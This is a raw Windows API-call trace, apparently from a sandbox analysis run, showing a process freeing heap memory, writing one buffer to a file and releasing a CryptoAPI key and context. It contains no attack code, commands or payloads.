1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1a788 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f18fb8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d728 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f177e8 | out: hHeap=0x970000) returned 1 [0266.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0266.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f16018 [0266.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1eef8 | out: hHeap=0x970000) returned 1 [0266.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.326] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.326] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.327] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f177e8 [0266.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.327] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f177e8*, nNumberOfBytesToWrite=0x17c8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f177e8*, lpNumberOfBytesWritten=0x8cf5e4*=0x17c8, lpOverlapped=0x0) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f177e8 | out: hHeap=0x970000) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.328] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.329] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0266.329] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.330] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51bb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0266.330] CryptDestroyKey (hKey=0xa87650) returned 1 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0266.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0266.332] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0266.332] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.332] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.332] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.332] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.333] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.333] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.333] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0266.333] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.333] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.333] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.333] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.333] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.333] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.334] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.334] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.335] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.335] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0266.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.335] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0266.339] 